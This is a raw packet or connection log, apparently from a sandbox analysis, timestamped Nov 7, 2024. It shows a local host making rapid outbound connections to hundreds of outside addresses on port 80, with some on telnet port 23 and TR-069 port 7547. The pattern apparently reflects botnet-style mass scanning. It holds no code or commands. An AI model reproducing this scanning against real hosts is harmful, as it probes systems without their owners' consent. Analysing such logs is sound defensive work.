                                          Nov 7, 2024 11:57:59.421363115 CET254480192.168.2.1395.48.170.162
                                          Nov 7, 2024 11:57:59.421365023 CET80254495.37.129.112192.168.2.13
                                          Nov 7, 2024 11:57:59.421375036 CET80254495.23.63.194192.168.2.13
                                          Nov 7, 2024 11:57:59.421382904 CET254480192.168.2.1395.17.234.210
                                          Nov 7, 2024 11:57:59.421385050 CET80254495.196.26.104192.168.2.13
                                          Nov 7, 2024 11:57:59.421391964 CET254480192.168.2.1395.97.207.222
                                          Nov 7, 2024 11:57:59.421397924 CET80254495.195.1.57192.168.2.13
                                          Nov 7, 2024 11:57:59.421406984 CET80254495.182.237.174192.168.2.13
                                          Nov 7, 2024 11:57:59.421406984 CET254480192.168.2.1395.23.63.194
                                          Nov 7, 2024 11:57:59.421415091 CET254480192.168.2.1395.37.129.112
                                          Nov 7, 2024 11:57:59.421425104 CET254480192.168.2.1395.196.26.104
                                          Nov 7, 2024 11:57:59.421426058 CET80254495.34.190.207192.168.2.13
                                          Nov 7, 2024 11:57:59.421437025 CET254480192.168.2.1395.195.1.57
                                          Nov 7, 2024 11:57:59.421437979 CET80254495.56.105.98192.168.2.13
                                          Nov 7, 2024 11:57:59.421448946 CET80254495.147.210.73192.168.2.13
                                          Nov 7, 2024 11:57:59.421453953 CET254480192.168.2.1395.34.190.207
                                          Nov 7, 2024 11:57:59.421458006 CET80254495.75.185.154192.168.2.13
                                          Nov 7, 2024 11:57:59.421468019 CET80254495.164.46.31192.168.2.13
                                          Nov 7, 2024 11:57:59.421468973 CET254480192.168.2.1395.56.105.98
                                          Nov 7, 2024 11:57:59.421478987 CET80254495.62.131.245192.168.2.13
                                          Nov 7, 2024 11:57:59.421483994 CET254480192.168.2.1395.182.237.174
                                          Nov 7, 2024 11:57:59.421488047 CET254480192.168.2.1395.147.210.73
                                          Nov 7, 2024 11:57:59.421489000 CET80254495.224.125.66192.168.2.13
                                          Nov 7, 2024 11:57:59.421492100 CET254480192.168.2.1395.75.185.154
                                          Nov 7, 2024 11:57:59.421499968 CET80254495.244.6.200192.168.2.13
                                          Nov 7, 2024 11:57:59.421504974 CET254480192.168.2.1395.164.46.31
                                          Nov 7, 2024 11:57:59.421514988 CET254480192.168.2.1395.62.131.245
                                          Nov 7, 2024 11:57:59.421518087 CET80254495.0.103.176192.168.2.13
                                          Nov 7, 2024 11:57:59.421536922 CET80254495.63.1.124192.168.2.13
                                          Nov 7, 2024 11:57:59.421540022 CET254480192.168.2.1395.224.125.66
                                          Nov 7, 2024 11:57:59.421541929 CET254480192.168.2.1395.244.6.200
                                          Nov 7, 2024 11:57:59.421547890 CET80254495.20.69.124192.168.2.13
                                          Nov 7, 2024 11:57:59.421552896 CET254480192.168.2.1395.0.103.176
                                          Nov 7, 2024 11:57:59.421559095 CET80254495.226.107.129192.168.2.13
                                          Nov 7, 2024 11:57:59.421569109 CET80254495.148.54.171192.168.2.13
                                          Nov 7, 2024 11:57:59.421572924 CET254480192.168.2.1395.63.1.124
                                          Nov 7, 2024 11:57:59.421580076 CET80254495.146.140.169192.168.2.13
                                          Nov 7, 2024 11:57:59.421581030 CET254480192.168.2.1395.20.69.124
                                          Nov 7, 2024 11:57:59.421591043 CET80254495.26.105.78192.168.2.13
                                          Nov 7, 2024 11:57:59.421597004 CET254480192.168.2.1395.226.107.129
                                          Nov 7, 2024 11:57:59.421605110 CET80254495.17.132.162192.168.2.13
                                          Nov 7, 2024 11:57:59.421612024 CET254480192.168.2.1395.148.54.171
                                          Nov 7, 2024 11:57:59.421614885 CET254480192.168.2.1395.146.140.169
                                          Nov 7, 2024 11:57:59.421623945 CET254480192.168.2.1395.26.105.78
                                          Nov 7, 2024 11:57:59.421643972 CET254480192.168.2.1395.17.132.162
                                          Nov 7, 2024 11:57:59.423053026 CET80254495.45.84.151192.168.2.13
                                          Nov 7, 2024 11:57:59.423062086 CET389487547192.168.2.1358.52.165.16
                                          Nov 7, 2024 11:57:59.423063040 CET80254495.185.163.211192.168.2.13
                                          Nov 7, 2024 11:57:59.423084021 CET254480192.168.2.1395.45.84.151
                                          Nov 7, 2024 11:57:59.423099041 CET254480192.168.2.1395.185.163.211
                                          Nov 7, 2024 11:57:59.423198938 CET80254495.19.221.87192.168.2.13
                                          Nov 7, 2024 11:57:59.423209906 CET80254495.40.92.186192.168.2.13
                                          Nov 7, 2024 11:57:59.423219919 CET80254495.245.188.2192.168.2.13
                                          Nov 7, 2024 11:57:59.423229933 CET80254495.239.213.78192.168.2.13
                                          Nov 7, 2024 11:57:59.423238039 CET254480192.168.2.1395.19.221.87
                                          Nov 7, 2024 11:57:59.423239946 CET254480192.168.2.1395.40.92.186
                                          Nov 7, 2024 11:57:59.423239946 CET80254495.172.234.100192.168.2.13
                                          Nov 7, 2024 11:57:59.423252106 CET80254495.230.106.165192.168.2.13
                                          Nov 7, 2024 11:57:59.423257113 CET254480192.168.2.1395.245.188.2
                                          Nov 7, 2024 11:57:59.423261881 CET80254495.141.119.15192.168.2.13
                                          Nov 7, 2024 11:57:59.423265934 CET254480192.168.2.1395.239.213.78
                                          Nov 7, 2024 11:57:59.423273087 CET80254495.49.148.195192.168.2.13
                                          Nov 7, 2024 11:57:59.423288107 CET254480192.168.2.1395.172.234.100
                                          Nov 7, 2024 11:57:59.423293114 CET80254495.156.102.27192.168.2.13
                                          Nov 7, 2024 11:57:59.423296928 CET254480192.168.2.1395.141.119.15
                                          Nov 7, 2024 11:57:59.423304081 CET80254495.58.185.248192.168.2.13
                                          Nov 7, 2024 11:57:59.423306942 CET3779423192.168.2.1345.41.30.48
                                          Nov 7, 2024 11:57:59.423319101 CET254480192.168.2.1395.230.106.165
                                          Nov 7, 2024 11:57:59.423321009 CET80254495.7.182.226192.168.2.13
                                          Nov 7, 2024 11:57:59.423326015 CET254480192.168.2.1395.49.148.195
                                          Nov 7, 2024 11:57:59.423331976 CET80254495.249.168.96192.168.2.13
                                          Nov 7, 2024 11:57:59.423331976 CET254480192.168.2.1395.156.102.27
                                          Nov 7, 2024 11:57:59.423343897 CET80254495.208.35.155192.168.2.13
                                          Nov 7, 2024 11:57:59.423346996 CET254480192.168.2.1395.58.185.248
                                          Nov 7, 2024 11:57:59.423353910 CET80254495.59.48.196192.168.2.13
                                          Nov 7, 2024 11:57:59.423356056 CET254480192.168.2.1395.7.182.226
                                          Nov 7, 2024 11:57:59.423366070 CET80254495.162.66.109192.168.2.13
                                          Nov 7, 2024 11:57:59.423369884 CET254480192.168.2.1395.208.35.155
                                          Nov 7, 2024 11:57:59.423371077 CET254480192.168.2.1395.249.168.96
                                          Nov 7, 2024 11:57:59.423377037 CET80254495.172.237.121192.168.2.13
                                          Nov 7, 2024 11:57:59.423388004 CET80254495.73.66.116192.168.2.13
                                          Nov 7, 2024 11:57:59.423392057 CET254480192.168.2.1395.59.48.196
                                          Nov 7, 2024 11:57:59.423398018 CET80254495.159.62.124192.168.2.13
                                          Nov 7, 2024 11:57:59.423408031 CET254480192.168.2.1395.162.66.109
                                          Nov 7, 2024 11:57:59.423408031 CET80254495.197.23.141192.168.2.13
                                          Nov 7, 2024 11:57:59.423413992 CET254480192.168.2.1395.172.237.121
                                          Nov 7, 2024 11:57:59.423413992 CET254480192.168.2.1395.73.66.116
                                          Nov 7, 2024 11:57:59.423420906 CET80254495.80.177.182192.168.2.13
                                          Nov 7, 2024 11:57:59.423432112 CET80254495.78.46.89192.168.2.13
                                          Nov 7, 2024 11:57:59.423440933 CET80254495.155.40.140192.168.2.13
                                          Nov 7, 2024 11:57:59.423450947 CET80254495.115.42.84192.168.2.13
                                          Nov 7, 2024 11:57:59.423450947 CET254480192.168.2.1395.80.177.182
                                          Nov 7, 2024 11:57:59.423456907 CET254480192.168.2.1395.159.62.124
                                          Nov 7, 2024 11:57:59.423458099 CET254480192.168.2.1395.197.23.141
                                          Nov 7, 2024 11:57:59.423460007 CET80254495.205.159.29192.168.2.13
                                          Nov 7, 2024 11:57:59.423460960 CET254480192.168.2.1395.78.46.89
                                          Nov 7, 2024 11:57:59.423472881 CET80254495.217.80.80192.168.2.13
                                          Nov 7, 2024 11:57:59.423482895 CET80254495.114.91.215192.168.2.13
                                          Nov 7, 2024 11:57:59.423484087 CET254480192.168.2.1395.155.40.140
                                          Nov 7, 2024 11:57:59.423486948 CET254480192.168.2.1395.115.42.84
                                          Nov 7, 2024 11:57:59.423492908 CET254480192.168.2.1395.205.159.29
                                          Nov 7, 2024 11:57:59.423518896 CET254480192.168.2.1395.217.80.80
                                          Nov 7, 2024 11:57:59.423535109 CET254480192.168.2.1395.114.91.215
                                          Nov 7, 2024 11:57:59.424844027 CET80254495.27.45.142192.168.2.13
                                          Nov 7, 2024 11:57:59.424881935 CET254480192.168.2.1395.27.45.142
                                          Nov 7, 2024 11:57:59.425030947 CET80254495.48.40.176192.168.2.13
                                          Nov 7, 2024 11:57:59.425040960 CET80254495.214.175.46192.168.2.13
                                          Nov 7, 2024 11:57:59.425050974 CET80254495.216.40.189192.168.2.13
                                          Nov 7, 2024 11:57:59.425060987 CET80254495.125.114.190192.168.2.13
                                          Nov 7, 2024 11:57:59.425071001 CET80254495.80.104.252192.168.2.13
                                          Nov 7, 2024 11:57:59.425081015 CET254480192.168.2.1395.214.175.46
                                          Nov 7, 2024 11:57:59.425081015 CET80254495.106.233.146192.168.2.13
                                          Nov 7, 2024 11:57:59.425084114 CET254480192.168.2.1395.48.40.176
                                          Nov 7, 2024 11:57:59.425085068 CET254480192.168.2.1395.216.40.189
                                          Nov 7, 2024 11:57:59.425091982 CET80254495.56.73.124192.168.2.13
                                          Nov 7, 2024 11:57:59.425101995 CET80254495.204.248.200192.168.2.13
                                          Nov 7, 2024 11:57:59.425103903 CET254480192.168.2.1395.80.104.252
                                          Nov 7, 2024 11:57:59.425106049 CET254480192.168.2.1395.125.114.190
                                          Nov 7, 2024 11:57:59.425112009 CET80254495.4.121.35192.168.2.13
                                          Nov 7, 2024 11:57:59.425121069 CET80254495.197.122.220192.168.2.13
                                          Nov 7, 2024 11:57:59.425122976 CET254480192.168.2.1395.106.233.146
                                          Nov 7, 2024 11:57:59.425126076 CET254480192.168.2.1395.204.248.200
                                          Nov 7, 2024 11:57:59.425133944 CET80254495.62.98.10192.168.2.13
                                          Nov 7, 2024 11:57:59.425133944 CET254480192.168.2.1395.56.73.124
                                          Nov 7, 2024 11:57:59.425144911 CET80254495.50.190.247192.168.2.13
                                          Nov 7, 2024 11:57:59.425153971 CET80254495.238.182.115192.168.2.13
                                          Nov 7, 2024 11:57:59.425159931 CET254480192.168.2.1395.4.121.35
                                          Nov 7, 2024 11:57:59.425163031 CET254480192.168.2.1395.197.122.220
                                          Nov 7, 2024 11:57:59.425163031 CET254480192.168.2.1395.62.98.10
                                          Nov 7, 2024 11:57:59.425172091 CET80254495.203.47.6192.168.2.13
                                          Nov 7, 2024 11:57:59.425188065 CET80254495.150.125.114192.168.2.13
                                          Nov 7, 2024 11:57:59.425196886 CET80254495.119.47.188192.168.2.13
                                          Nov 7, 2024 11:57:59.425206900 CET80254495.28.20.229192.168.2.13
                                          Nov 7, 2024 11:57:59.425208092 CET254480192.168.2.1395.50.190.247
                                          Nov 7, 2024 11:57:59.425214052 CET254480192.168.2.1395.238.182.115
                                          Nov 7, 2024 11:57:59.425214052 CET254480192.168.2.1395.203.47.6
                                          Nov 7, 2024 11:57:59.425216913 CET80254495.222.124.203192.168.2.13
                                          Nov 7, 2024 11:57:59.425228119 CET80254495.191.76.246192.168.2.13
                                          Nov 7, 2024 11:57:59.425229073 CET254480192.168.2.1395.150.125.114
                                          Nov 7, 2024 11:57:59.425237894 CET254480192.168.2.1395.28.20.229
                                          Nov 7, 2024 11:57:59.425237894 CET80254495.164.83.142192.168.2.13
                                          Nov 7, 2024 11:57:59.425240993 CET254480192.168.2.1395.119.47.188
                                          Nov 7, 2024 11:57:59.425251007 CET80254495.210.104.110192.168.2.13
                                          Nov 7, 2024 11:57:59.425260067 CET80254495.3.27.76192.168.2.13
                                          Nov 7, 2024 11:57:59.425262928 CET254480192.168.2.1395.222.124.203
                                          Nov 7, 2024 11:57:59.425263882 CET3711823192.168.2.13118.31.154.82
                                          Nov 7, 2024 11:57:59.425270081 CET254480192.168.2.1395.191.76.246
                                          Nov 7, 2024 11:57:59.425271034 CET80254495.195.19.228192.168.2.13
                                          Nov 7, 2024 11:57:59.425276041 CET254480192.168.2.1395.164.83.142
                                          Nov 7, 2024 11:57:59.425277948 CET254480192.168.2.1395.210.104.110
                                          Nov 7, 2024 11:57:59.425282955 CET80254495.156.232.249192.168.2.13
                                          Nov 7, 2024 11:57:59.425295115 CET80254495.180.203.75192.168.2.13
                                          Nov 7, 2024 11:57:59.425304890 CET80254495.177.38.212192.168.2.13
                                          Nov 7, 2024 11:57:59.425313950 CET254480192.168.2.1395.3.27.76
                                          Nov 7, 2024 11:57:59.425314903 CET254480192.168.2.1395.195.19.228
                                          Nov 7, 2024 11:57:59.425317049 CET254480192.168.2.1395.156.232.249
                                          Nov 7, 2024 11:57:59.425354958 CET254480192.168.2.1395.180.203.75
                                          Nov 7, 2024 11:57:59.425355911 CET254480192.168.2.1395.177.38.212
                                          Nov 7, 2024 11:57:59.425383091 CET460187547192.168.2.13144.24.215.144
                                          Nov 7, 2024 11:57:59.426434040 CET80254495.72.202.52192.168.2.13
                                          Nov 7, 2024 11:57:59.426445007 CET80254495.42.56.214192.168.2.13
                                          Nov 7, 2024 11:57:59.426455021 CET80254495.229.225.3192.168.2.13
                                          Nov 7, 2024 11:57:59.426466942 CET80254495.132.59.224192.168.2.13
                                          Nov 7, 2024 11:57:59.426476955 CET254480192.168.2.1395.42.56.214
                                          Nov 7, 2024 11:57:59.426479101 CET254480192.168.2.1395.72.202.52
                                          Nov 7, 2024 11:57:59.426484108 CET254480192.168.2.1395.229.225.3
                                          Nov 7, 2024 11:57:59.426496029 CET254480192.168.2.1395.132.59.224
                                          Nov 7, 2024 11:57:59.426532030 CET80254495.69.172.34192.168.2.13
                                          Nov 7, 2024 11:57:59.426548958 CET80254495.145.189.7192.168.2.13
                                          Nov 7, 2024 11:57:59.426558971 CET80254495.76.115.8192.168.2.13
                                          Nov 7, 2024 11:57:59.426568985 CET80254495.115.148.41192.168.2.13
                                          Nov 7, 2024 11:57:59.426578999 CET80254495.106.28.73192.168.2.13
                                          Nov 7, 2024 11:57:59.426578999 CET254480192.168.2.1395.69.172.34
                                          Nov 7, 2024 11:57:59.426578999 CET254480192.168.2.1395.145.189.7
                                          Nov 7, 2024 11:57:59.426585913 CET254480192.168.2.1395.76.115.8
                                          Nov 7, 2024 11:57:59.426589966 CET80254495.49.220.254192.168.2.13
                                          Nov 7, 2024 11:57:59.426611900 CET80254495.189.26.218192.168.2.13
                                          Nov 7, 2024 11:57:59.426615000 CET254480192.168.2.1395.115.148.41
                                          Nov 7, 2024 11:57:59.426619053 CET254480192.168.2.1395.106.28.73
                                          Nov 7, 2024 11:57:59.426621914 CET80254495.150.55.78192.168.2.13
                                          Nov 7, 2024 11:57:59.426621914 CET254480192.168.2.1395.49.220.254
                                          Nov 7, 2024 11:57:59.426632881 CET80254495.200.137.31192.168.2.13
                                          Nov 7, 2024 11:57:59.426642895 CET80254495.72.173.222192.168.2.13
                                          Nov 7, 2024 11:57:59.426644087 CET254480192.168.2.1395.189.26.218
                                          Nov 7, 2024 11:57:59.426650047 CET254480192.168.2.1395.150.55.78
                                          Nov 7, 2024 11:57:59.426654100 CET80254495.118.110.77192.168.2.13
                                          Nov 7, 2024 11:57:59.426664114 CET80254495.76.211.77192.168.2.13
                                          Nov 7, 2024 11:57:59.426668882 CET254480192.168.2.1395.72.173.222
                                          Nov 7, 2024 11:57:59.426670074 CET254480192.168.2.1395.200.137.31
                                          Nov 7, 2024 11:57:59.426672935 CET80254495.14.224.62192.168.2.13
                                          Nov 7, 2024 11:57:59.426687956 CET254480192.168.2.1395.118.110.77
                                          Nov 7, 2024 11:57:59.426691055 CET80254495.106.16.242192.168.2.13
                                          Nov 7, 2024 11:57:59.426702023 CET80254495.185.59.241192.168.2.13
                                          Nov 7, 2024 11:57:59.426709890 CET254480192.168.2.1395.76.211.77
                                          Nov 7, 2024 11:57:59.426711082 CET254480192.168.2.1395.14.224.62
                                          Nov 7, 2024 11:57:59.426712036 CET80254495.254.237.141192.168.2.13
                                          Nov 7, 2024 11:57:59.426722050 CET80254495.181.75.157192.168.2.13
                                          Nov 7, 2024 11:57:59.426732063 CET80254495.251.128.99192.168.2.13
                                          Nov 7, 2024 11:57:59.426733971 CET254480192.168.2.1395.185.59.241
                                          Nov 7, 2024 11:57:59.426738977 CET254480192.168.2.1395.106.16.242
                                          Nov 7, 2024 11:57:59.426740885 CET254480192.168.2.1395.254.237.141
                                          Nov 7, 2024 11:57:59.426742077 CET80254495.77.37.109192.168.2.13
                                          Nov 7, 2024 11:57:59.426759958 CET80254495.164.36.189192.168.2.13
                                          Nov 7, 2024 11:57:59.426764011 CET254480192.168.2.1395.181.75.157
                                          Nov 7, 2024 11:57:59.426770926 CET80254495.217.207.17192.168.2.13
                                          Nov 7, 2024 11:57:59.426773071 CET254480192.168.2.1395.251.128.99
                                          Nov 7, 2024 11:57:59.426773071 CET254480192.168.2.1395.77.37.109
                                          Nov 7, 2024 11:57:59.426780939 CET80254495.151.237.45192.168.2.13
                                          Nov 7, 2024 11:57:59.426791906 CET80254495.85.36.11192.168.2.13
                                          Nov 7, 2024 11:57:59.426793098 CET254480192.168.2.1395.164.36.189
                                          Nov 7, 2024 11:57:59.426801920 CET80254495.168.181.70192.168.2.13
                                          Nov 7, 2024 11:57:59.426810980 CET254480192.168.2.1395.151.237.45
                                          Nov 7, 2024 11:57:59.426815033 CET254480192.168.2.1395.217.207.17
                                          Nov 7, 2024 11:57:59.426834106 CET254480192.168.2.1395.85.36.11
                                          Nov 7, 2024 11:57:59.426835060 CET254480192.168.2.1395.168.181.70
                                          Nov 7, 2024 11:57:59.427179098 CET3044880192.168.2.132.200.234.221
                                          Nov 7, 2024 11:57:59.427180052 CET3044880192.168.2.132.175.191.21
                                          Nov 7, 2024 11:57:59.427181959 CET3044880192.168.2.132.199.123.148
                                          Nov 7, 2024 11:57:59.427196980 CET3044880192.168.2.132.113.53.43
                                          Nov 7, 2024 11:57:59.427196980 CET3044880192.168.2.132.2.240.137
                                          Nov 7, 2024 11:57:59.427201033 CET3044880192.168.2.132.27.205.22
                                          Nov 7, 2024 11:57:59.427203894 CET3044880192.168.2.132.162.39.24
                                          Nov 7, 2024 11:57:59.427208900 CET3044880192.168.2.132.129.101.98
                                          Nov 7, 2024 11:57:59.427221060 CET3044880192.168.2.132.157.197.8
                                          Nov 7, 2024 11:57:59.427236080 CET4610423192.168.2.13128.243.188.47
                                          Nov 7, 2024 11:57:59.427243948 CET3044880192.168.2.132.176.140.142
                                          Nov 7, 2024 11:57:59.427262068 CET3044880192.168.2.132.147.135.150
                                          Nov 7, 2024 11:57:59.427263975 CET3044880192.168.2.132.144.199.136
                                          Nov 7, 2024 11:57:59.427278996 CET3044880192.168.2.132.133.252.74
                                          Nov 7, 2024 11:57:59.427279949 CET3044880192.168.2.132.35.73.111
                                          Nov 7, 2024 11:57:59.427280903 CET3044880192.168.2.132.97.81.241
                                          Nov 7, 2024 11:57:59.427283049 CET3044880192.168.2.132.23.42.28
                                          Nov 7, 2024 11:57:59.427293062 CET3044880192.168.2.132.254.49.62
                                          Nov 7, 2024 11:57:59.427299023 CET3044880192.168.2.132.24.48.182
                                          Nov 7, 2024 11:57:59.427303076 CET3044880192.168.2.132.92.106.210
                                          Nov 7, 2024 11:57:59.427305937 CET3044880192.168.2.132.189.222.92
                                          Nov 7, 2024 11:57:59.427340984 CET3044880192.168.2.132.161.130.81
                                          Nov 7, 2024 11:57:59.427341938 CET520347547192.168.2.13145.65.108.245
                                          Nov 7, 2024 11:57:59.427356958 CET3044880192.168.2.132.178.208.142
                                          Nov 7, 2024 11:57:59.427360058 CET3044880192.168.2.132.70.175.115
                                          Nov 7, 2024 11:57:59.427364111 CET3044880192.168.2.132.230.93.212
                                          Nov 7, 2024 11:57:59.427383900 CET3044880192.168.2.132.158.177.229
                                          Nov 7, 2024 11:57:59.427387953 CET3044880192.168.2.132.57.207.86
                                          Nov 7, 2024 11:57:59.427387953 CET3044880192.168.2.132.190.171.53
                                          Nov 7, 2024 11:57:59.427388906 CET3044880192.168.2.132.226.192.184
                                          Nov 7, 2024 11:57:59.427401066 CET3044880192.168.2.132.144.71.247
                                          Nov 7, 2024 11:57:59.427417994 CET3044880192.168.2.132.225.103.176
                                          Nov 7, 2024 11:57:59.427418947 CET3044880192.168.2.132.8.54.15
                                          Nov 7, 2024 11:57:59.427432060 CET3044880192.168.2.132.143.64.252
                                          Nov 7, 2024 11:57:59.427433014 CET3044880192.168.2.132.221.220.114
                                          Nov 7, 2024 11:57:59.427448988 CET3044880192.168.2.132.220.242.206
                                          Nov 7, 2024 11:57:59.427453041 CET3044880192.168.2.132.37.242.12
                                          Nov 7, 2024 11:57:59.427453041 CET3044880192.168.2.132.146.5.225
                                          Nov 7, 2024 11:57:59.427470922 CET3044880192.168.2.132.191.96.106
                                          Nov 7, 2024 11:57:59.427475929 CET3044880192.168.2.132.105.171.94
                                          Nov 7, 2024 11:57:59.427476883 CET3044880192.168.2.132.255.192.211
                                          Nov 7, 2024 11:57:59.427484989 CET3044880192.168.2.132.80.186.242
                                          Nov 7, 2024 11:57:59.427499056 CET3044880192.168.2.132.218.154.32
                                          Nov 7, 2024 11:57:59.427503109 CET3044880192.168.2.132.14.105.1
                                          Nov 7, 2024 11:57:59.427504063 CET3044880192.168.2.132.76.124.143
                                          Nov 7, 2024 11:57:59.427519083 CET3044880192.168.2.132.187.38.107
                                          Nov 7, 2024 11:57:59.427522898 CET3044880192.168.2.132.105.55.104
                                          Nov 7, 2024 11:57:59.427531958 CET3044880192.168.2.132.137.180.138
                                          Nov 7, 2024 11:57:59.427532911 CET3044880192.168.2.132.22.37.114
                                          Nov 7, 2024 11:57:59.427553892 CET3044880192.168.2.132.192.160.56
                                          Nov 7, 2024 11:57:59.427553892 CET3044880192.168.2.132.148.173.190
                                          Nov 7, 2024 11:57:59.427561998 CET3044880192.168.2.132.181.120.21
                                          Nov 7, 2024 11:57:59.427567959 CET3044880192.168.2.132.254.237.26
                                          Nov 7, 2024 11:57:59.427577019 CET3044880192.168.2.132.23.102.229
                                          Nov 7, 2024 11:57:59.427577019 CET3044880192.168.2.132.225.253.6
                                          Nov 7, 2024 11:57:59.427597046 CET3044880192.168.2.132.56.168.31
                                          Nov 7, 2024 11:57:59.427599907 CET3044880192.168.2.132.233.19.245
                                          Nov 7, 2024 11:57:59.427599907 CET3044880192.168.2.132.193.5.245
                                          Nov 7, 2024 11:57:59.427603006 CET3044880192.168.2.132.180.135.80
                                          Nov 7, 2024 11:57:59.427606106 CET3044880192.168.2.132.61.169.106
                                          Nov 7, 2024 11:57:59.427622080 CET3044880192.168.2.132.24.16.228
                                          Nov 7, 2024 11:57:59.427630901 CET3044880192.168.2.132.143.252.188
                                          Nov 7, 2024 11:57:59.427638054 CET3044880192.168.2.132.33.219.245
                                          Nov 7, 2024 11:57:59.427639961 CET3044880192.168.2.132.186.47.236
                                          Nov 7, 2024 11:57:59.427649975 CET3044880192.168.2.132.186.176.186
                                          Nov 7, 2024 11:57:59.427654028 CET3044880192.168.2.132.172.23.100
                                          Nov 7, 2024 11:57:59.427656889 CET3044880192.168.2.132.221.165.124
                                          Nov 7, 2024 11:57:59.427661896 CET3044880192.168.2.132.152.206.175
                                          Nov 7, 2024 11:57:59.427673101 CET3044880192.168.2.132.224.247.22
                                          Nov 7, 2024 11:57:59.427685976 CET3044880192.168.2.132.79.44.6
                                          Nov 7, 2024 11:57:59.427686930 CET3044880192.168.2.132.46.95.99
                                          Nov 7, 2024 11:57:59.427699089 CET3044880192.168.2.132.88.172.254
                                          Nov 7, 2024 11:57:59.427700043 CET3044880192.168.2.132.103.94.74
                                          Nov 7, 2024 11:57:59.427702904 CET3044880192.168.2.132.124.149.120
                                          Nov 7, 2024 11:57:59.427702904 CET3044880192.168.2.132.227.237.159
                                          Nov 7, 2024 11:57:59.427711964 CET3044880192.168.2.132.154.11.82
                                          Nov 7, 2024 11:57:59.427716970 CET3044880192.168.2.132.174.249.253
                                          Nov 7, 2024 11:57:59.427736044 CET3044880192.168.2.132.81.213.95
                                          Nov 7, 2024 11:57:59.427740097 CET3044880192.168.2.132.34.53.162
                                          Nov 7, 2024 11:57:59.427752018 CET3044880192.168.2.132.222.112.85
                                          Nov 7, 2024 11:57:59.427755117 CET3044880192.168.2.132.24.31.175
                                          Nov 7, 2024 11:57:59.427781105 CET3044880192.168.2.132.99.190.42
                                          Nov 7, 2024 11:57:59.427783012 CET3044880192.168.2.132.129.8.83
                                          Nov 7, 2024 11:57:59.427783966 CET3044880192.168.2.132.89.155.50
                                          Nov 7, 2024 11:57:59.427783966 CET3044880192.168.2.132.223.250.54
                                          Nov 7, 2024 11:57:59.427787066 CET3044880192.168.2.132.37.64.9
                                          Nov 7, 2024 11:57:59.427793980 CET3044880192.168.2.132.229.111.148
                                          Nov 7, 2024 11:57:59.427808046 CET3044880192.168.2.132.26.51.175
                                          Nov 7, 2024 11:57:59.427818060 CET3044880192.168.2.132.27.35.92
                                          Nov 7, 2024 11:57:59.427823067 CET3044880192.168.2.132.138.214.156
                                          Nov 7, 2024 11:57:59.427824974 CET3044880192.168.2.132.20.97.249
                                          Nov 7, 2024 11:57:59.427841902 CET3044880192.168.2.132.165.134.97
                                          Nov 7, 2024 11:57:59.427856922 CET3044880192.168.2.132.17.69.13
                                          Nov 7, 2024 11:57:59.427867889 CET3044880192.168.2.132.188.100.152
                                          Nov 7, 2024 11:57:59.427869081 CET3044880192.168.2.132.198.247.225
                                          Nov 7, 2024 11:57:59.427870989 CET3044880192.168.2.132.0.24.109
                                          Nov 7, 2024 11:57:59.427887917 CET3044880192.168.2.132.117.111.69
                                          Nov 7, 2024 11:57:59.427887917 CET3044880192.168.2.132.66.110.229
                                          Nov 7, 2024 11:57:59.427890062 CET3044880192.168.2.132.134.119.23
                                          Nov 7, 2024 11:57:59.427896023 CET3044880192.168.2.132.225.149.20
                                          Nov 7, 2024 11:57:59.427908897 CET3044880192.168.2.132.25.118.252
                                          Nov 7, 2024 11:57:59.427908897 CET3044880192.168.2.132.223.206.236
                                          Nov 7, 2024 11:57:59.427932978 CET3044880192.168.2.132.191.169.122
                                          Nov 7, 2024 11:57:59.427936077 CET3044880192.168.2.132.29.152.48
                                          Nov 7, 2024 11:57:59.427936077 CET3044880192.168.2.132.40.235.253
                                          Nov 7, 2024 11:57:59.427949905 CET3044880192.168.2.132.153.128.71
                                          Nov 7, 2024 11:57:59.427952051 CET3044880192.168.2.132.126.209.149
                                          Nov 7, 2024 11:57:59.427953959 CET3044880192.168.2.132.177.127.149
                                          Nov 7, 2024 11:57:59.427968025 CET3044880192.168.2.132.23.28.160
                                          Nov 7, 2024 11:57:59.427972078 CET3044880192.168.2.132.195.142.87
                                          Nov 7, 2024 11:57:59.427984953 CET3044880192.168.2.132.129.55.114
                                          Nov 7, 2024 11:57:59.427987099 CET3044880192.168.2.132.238.104.232
                                          Nov 7, 2024 11:57:59.427987099 CET3044880192.168.2.132.26.172.194
                                          Nov 7, 2024 11:57:59.427988052 CET3044880192.168.2.132.38.162.153
                                          Nov 7, 2024 11:57:59.427994967 CET3044880192.168.2.132.43.146.95
                                          Nov 7, 2024 11:57:59.428018093 CET3044880192.168.2.132.178.103.35
                                          Nov 7, 2024 11:57:59.428019047 CET3044880192.168.2.132.54.10.72
                                          Nov 7, 2024 11:57:59.428030968 CET3044880192.168.2.132.176.15.176
                                          Nov 7, 2024 11:57:59.428046942 CET3044880192.168.2.132.11.9.251
                                          Nov 7, 2024 11:57:59.428051949 CET3044880192.168.2.132.203.150.111
                                          Nov 7, 2024 11:57:59.428054094 CET3044880192.168.2.132.177.221.150
                                          Nov 7, 2024 11:57:59.428066969 CET3044880192.168.2.132.199.62.94
                                          Nov 7, 2024 11:57:59.428071022 CET3044880192.168.2.132.241.8.251
                                          Nov 7, 2024 11:57:59.428073883 CET3044880192.168.2.132.181.204.81
                                          Nov 7, 2024 11:57:59.428075075 CET3044880192.168.2.132.78.11.103
                                          Nov 7, 2024 11:57:59.428075075 CET3044880192.168.2.132.17.120.141
                                          Nov 7, 2024 11:57:59.428092957 CET3044880192.168.2.132.144.76.165
                                          Nov 7, 2024 11:57:59.428103924 CET3044880192.168.2.132.72.170.88
                                          Nov 7, 2024 11:57:59.428103924 CET3044880192.168.2.132.24.197.71
                                          Nov 7, 2024 11:57:59.428105116 CET3044880192.168.2.132.46.123.242
                                          Nov 7, 2024 11:57:59.428109884 CET3044880192.168.2.132.156.190.211
                                          Nov 7, 2024 11:57:59.428116083 CET3044880192.168.2.132.9.238.193
                                          Nov 7, 2024 11:57:59.428124905 CET3044880192.168.2.132.224.45.229
                                          Nov 7, 2024 11:57:59.428133011 CET3044880192.168.2.132.110.73.235
                                          Nov 7, 2024 11:57:59.428144932 CET3044880192.168.2.132.180.62.195
                                          Nov 7, 2024 11:57:59.428144932 CET3044880192.168.2.132.44.118.17
                                          Nov 7, 2024 11:57:59.428159952 CET3044880192.168.2.132.227.131.167
                                          Nov 7, 2024 11:57:59.428159952 CET3044880192.168.2.132.145.186.236
                                          Nov 7, 2024 11:57:59.428159952 CET3044880192.168.2.132.98.97.173
                                          Nov 7, 2024 11:57:59.428178072 CET3044880192.168.2.132.17.155.186
                                          Nov 7, 2024 11:57:59.428178072 CET3044880192.168.2.132.193.201.26
                                          Nov 7, 2024 11:57:59.428179026 CET3044880192.168.2.132.220.48.84
